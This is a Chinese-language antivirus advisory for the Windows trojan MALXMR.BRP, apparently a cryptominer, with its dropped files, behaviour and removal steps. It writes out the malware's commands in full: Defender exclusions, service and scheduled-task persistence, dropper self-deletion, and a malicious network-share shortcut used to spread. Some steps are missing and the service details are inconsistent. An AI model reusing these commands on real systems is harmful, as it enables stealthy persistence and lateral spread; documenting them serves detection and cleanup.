Trojan.Win64.MALXMR.BRP
Windows
恶意软件类型:
Trojan
有破坏性?:
没有
加密?:
In the Wild:
是的
概要
N
技术详细信息
安装
它植入下列文件:
- %System%\svcldr64.dat
- %System%\console_zero.exe
- %System%\x470764.dat
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.vbs
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.dat
- {Machine IP Address}\{Network Share Folder}\root\rootcomp.dat
- {Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk
(注意: %System% 是 Windows 的 system 文件夹,通常位于 C:\Windows\System (Windows 98 和 ME)、C:\WINNT\System32 (Windows NT 和 2000) 和 C:\WINDOWS\system32 (Windows 2000(32-bit)、XP、Server 2003(32-bit)、Vista、7、8、8.1、2008(64-bit),2012(64bit) 和 10(64-bit))。)
它添加下列进程:
- cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32'"
- cmd.exe /c sc create x470764 binPath= %System%\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x470764\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "%System%\x470764.dat" /f && sc start x470764
- cmd.exe /c start "" "%System%\console_zero.exe"
- cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "%System%\console_zero.exe" /rl HIGHEST /f
- cmd.exe /c timeout /t 16 /nobreak && del /q "%System%\svcldr64.dat"
- cmd.exe /c arp -a
- cmd.exe /c powershell -Command "$WshShell = New-Object -comObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut('\{Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk'); $Shortcut.WorkingDirectory = '\{Machine IP Address}\{Network Share Folder}\rootdir'; $Shortcut.TargetPath = '\{Machine IP Address}\{Network Share Folder}\rootdir\x{Random}.vbs'; $Shortcut.IconLocation = '%System%\shell32.dll, 8'; $Shortcut.Save()"
- cmd.exe /c start "" "%System%\crypti.exe"
(注意: %System% 是 Windows 的 system 文件夹,通常位于 C:\Windows\System (Windows 98 和 ME)、C:\WINNT\System32 (Windows NT 和 2000) 和 C:\WINDOWS\system32 (Windows 2000(32-bit)、XP、Server 2003(32-bit)、Vista、7、8、8.1、2008(64-bit),2012(64bit) 和 10(64-bit))。)
其他详细信息
该程序执行以下操作:
- It adds the following service:
- Name: x470764
- Start Type: On Logon
- Binary Path: %System%\console_zero.exe
(注意: %System% 是 Windows 的 system 文件夹,通常位于 C:\Windows\System (Windows 98 和 ME)、C:\WINNT\System32 (Windows NT 和 2000) 和 C:\WINDOWS\system32 (Windows 2000(32-bit)、XP、Server 2003(32-bit)、Vista、7、8、8.1、2008(64-bit),2012(64bit) 和 10(64-bit))。)
解决方案
Step 2
对于Windows ME和XP用户,在扫描前,请确认已禁用系统还原功能,才可全面扫描计算机。
Step 3
注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息,请继续进行下一步操作。
Step 4
重启进入安全模式
Step 6
禁用该恶意软件服务
- x470764
Step 7
删除该注册表键值
注意事项:错误编辑Windows注册表会导致不可挽回的系统故障。只有在您掌握后或在系统管理员的帮助下才能完成这步。或者,请先阅读Microsoft文章,然后再修改计算机注册表。
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
- x470764
- x470764
Step 8
搜索和删除这些文件
- %System%\svcldr64.dat
- %System%\console_zero.exe
- %System%\x470764.dat
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.vbs
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.dat
- {Machine IP Address}\{Network Share Folder}\root\rootcomp.dat
- {Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk
- %System%\svcldr64.dat
- %System%\console_zero.exe
- %System%\x470764.dat
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.vbs
- {Machine IP Address}\{Network Share Folder}\root\x{Random}.dat
- {Machine IP Address}\{Network Share Folder}\root\rootcomp.dat
- {Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk
Step 9
重启进入正常模式,使用亚信安全产品扫描计算机,检测Trojan.Win64.MALXMR.BRP文件 如果检测到的文件已被亚信安全产品清除、删除或隔离,则无需采取进一步措施。可以选择直接删除隔离的文件。请参阅知识库页面了解详细信息。